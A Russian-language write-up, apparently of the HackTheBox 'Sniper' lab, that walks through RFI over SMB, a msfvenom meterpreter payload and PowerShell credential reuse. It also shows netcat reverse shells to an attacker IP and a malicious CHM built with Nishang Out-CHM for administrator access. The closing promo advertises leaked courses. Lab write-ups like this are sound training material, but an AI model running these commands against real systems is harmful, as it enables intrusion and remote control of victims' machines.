![image](https://habrastorage.org/webt/mw/e8/nn/mwe8nn0gz2fm8hgspkwdeho_4ks.png)
Продолжаю публикацию решений отправленных на дорешивание машин с площадки HackTheBox. Надеюсь, что это поможет хоть кому-то развиваться в области ИБ. В данной статье эксплуатируем RFI, обходим блокировку shell meterpreter и создаем вредоносный CHM документ.
Подключение к лаборатории осуществляется через VPN. Рекомендуется не подключаться с рабочего компьютера или с хоста, где имеются важные для вас данные, так как Вы попадаете в частную сеть с людьми, которые что-то да умеют в области ИБ :)
Организационная информация
Специально для тех, кто хочет узнавать что-то новое и развиваться в любой из сфер информационной и компьютерной безопасности, я буду писать и рассказывать о следующих категориях:
Вдобавок к этому я поделюсь своим опытом в компьютерной криминалистике, анализе малвари и прошивок, атаках на беспроводные сети и локальные вычислительные сети, проведении пентестов и написании эксплоитов.
Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем.
Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.
- PWN;
- криптография (Crypto);
- cетевые технологии (Network);
- реверс (Reverse Engineering);
- стеганография (Stegano);
- поиск и эксплуатация WEB-уязвимостей.
Вдобавок к этому я поделюсь своим опытом в компьютерной криминалистике, анализе малвари и прошивок, атаках на беспроводные сети и локальные вычислительные сети, проведении пентестов и написании эксплоитов.
Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем.
Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.
Recon
Данная машина имеет IP адрес 10.10.10.151, который я добавляю в /etc/hosts.
10.10.10.151 sniper.htb
Первым делом сканируем открытые порты. Так как сканировать все порты nmap’ом долго, то я сначала сделаю это с помощью masscan. Мы сканируем все TCP и UDP порты с интерфейса tun0 со скоростью 1000 пакетов в секунду.
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.151 --rate=1000
![image](https://habrastorage.org/webt/b0/d-/bc/b0d-bcmgwi39ecmchwum4mpaw9e.png)
Теперь для получения более подробной информации о сервисах, которые работают на портах, запустим сканирование с опцией -А.
nmap -A sniper.htb -p80,135,139,445
![image](https://habrastorage.org/webt/74/gb/lx/74gblxgtomo9vkjxu0kvyf_gfiu.png)
На хосте открыто 4 порта, узнаем, что нам может дать веб-сервер.
![image](https://habrastorage.org/webt/pe/pd/52/pepd521x0lma21dqe_cwvyupfws.png)
Первые три ссылки пустые, а вот две других привели на страницы блога и авторизации.
![image](https://habrastorage.org/webt/em/pa/ji/empajismbhrjoadfawq41sm42kg.png)
![image](https://habrastorage.org/webt/qw/i5/gb/qwi5gbtzqf4tdxapfing4lapmgy.png)
Учетные данные типа admin:admin не подходят, а вот на странице блога интересный выбор языка.
![image](https://habrastorage.org/webt/px/0w/yz/px0wyz9zkvqypevr8mwtzong5kw.png)
Сразу возникают мысли о LFI. Давайте прочитаем один из доступных всем для чтения файлов, например hosts (и в Linux, и в Windows).
![image](https://habrastorage.org/webt/ul/tg/25/ultg25vu4wroskdf14ewld6s5vy.png)
Идея подтвердилась, имеем LFI.
Entry Point
Но есть возможность попробовать и RFI. Создадим тестовый файл.
![image](https://habrastorage.org/webt/qh/cd/lg/qhcdlgrcimk0xjdbjvvjfqpxkqe.png)
Развернем локальный SMB сервер SAMBA. Для этого напишем соответствующие конфигурации в файл /etc/samba/smb.conf. Нужно прописать путь к директории и дать разрешения для доступа от имени гостя.
![image](https://habrastorage.org/webt/gw/9v/fy/gw9vfysmkmh4xe8mjae5ponc7ta.png)
Теперь запустим smbd службу.
service smbd start
И обратившись к ресурсу, получим положительный результат.
![image](https://habrastorage.org/webt/rb/hv/hy/rbhvhy5cfqsxuh-wrrayo49zicu.png)
Теперь кидаем нагрузку. Создадим ее с помощью msfvenom, затем активируем листенер.
![image](https://habrastorage.org/webt/ti/c5/i4/tic5i4bdlufa7xxantq3nunvjmo.png)
![image](https://habrastorage.org/webt/j6/he/6r/j6he6rn0e7ngc6fp7wqfnaxq5am.png)
Обращаемся к файлу. И получаем подключение.
![image](https://habrastorage.org/webt/u7/jy/nt/u7jynt7q9qtojsosfd_giadr-t0.png)
![image](https://habrastorage.org/webt/04/ya/gj/04yagjyu6n5d2bszdwzbzkxa7ns.png)
Так как на сайте была страница авторизации, то мы можем найти хоть какие-нибудь учетные данные. Мы находимся в директории страницы blog.
![image](https://habrastorage.org/webt/6h/qx/h6/6hqxh6wrb78rgtmwvtpqljtyo90.png)
Давайте скачаем все, что есть в директории user.
![image](https://habrastorage.org/webt/af/0-/zc/af0-zcq7ryzkbzjwwoi4tfmxube.png)
Позже, просматривая все файлы на локальном хосте, находим учетные данные для подключения к базе.
![image](https://habrastorage.org/webt/kl/fh/kk/klfhkkdknyiejpkmxea9-vkhprq.png)
USER
Узнаем пользователей в системе. Но вот при выполнении любой команды через shell в meterpreter, получаем обрыв соединения. Неужели блокируется cmd? Попробуем обойти блокировку за счет создания процесса powershell в скрытом от просмотра (-H) интерактивном режиме (-i) с передачей нашей команды в качестве параметры (-a).
execute -f powershell -a "net users" -i -H
![image](https://habrastorage.org/webt/a9/qb/lf/a9qblfczpjvqxzgyq0-61e9wpdq.png)
А теперь давайте попробуем выполнить команду в контексте данного пользователя. Для этого в качестве параметра передадим следующий скриптик в powershell.
execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { whoami }" -i -H
![image](https://habrastorage.org/webt/ee/ww/zq/eewwzq3pw5qzd7tvofapblkqnbw.png)
Загрузим на хост netcat. Для этого в директории с ним запустим HTTP сервер.
python3 -m http.server 80
И выполним загрузку.
execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { iwr 10.10.15.55/nc -o C:\\Users\\Chris\\Documents\\nc.exe }" -i -H
Теперь запускаем у себя netcat, выполняем подключение и получаем сессию пользователя.
execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 6543}" -i -H
![image](https://habrastorage.org/webt/oc/db/zb/ocdbzb2elwzdnddhqgiv90ysoqc.png)
ROOT
Немного побродив по пользовательским директориям, найдем chm файл. Не понятно зачем он нужен.
![image](https://habrastorage.org/webt/j8/tn/cz/j8tncz_otbckfqjiaslog6yz9_y.png)
На диске C: в папке Docs оставлена записка, в которой говорится, что пользователь не умеет работать с PHP и должен подготовить документацию. Оставить документы нужно в данной папке.
![image](https://habrastorage.org/webt/un/g9/n6/ung9n6uucaywnk1zqzuhcwfp5a8.png)
Установим HTML Help Workshop. А потом сгенерируем вредоносный CHM файл с помощью Out-Chm из пакета Nishang.
Out-CHM -Payload "C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 8765" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
![image](https://habrastorage.org/webt/ud/bt/pf/udbtpfqzytij8dhktofl-lcyu94.png)
Теперь сохраним в целевую директорию на удаленном хосте наш файл.
wget http://10.10.15.55/doc.chm -o C:\Docs\doc.chm
И получаем сессию администратора.
![image](https://habrastorage.org/webt/tb/w_/j-/tbw_j-55ept0q_moagi8getiyka.png)
Вы можете присоединиться к нам в Telegram. Там можно будет найти интересные материалы, слитые курсы, а также ПО. Давайте соберем сообщество, в котором будут люди, разбирающиеся во многих сферах ИТ, тогда мы всегда сможем помочь друг другу по любым вопросам ИТ и ИБ.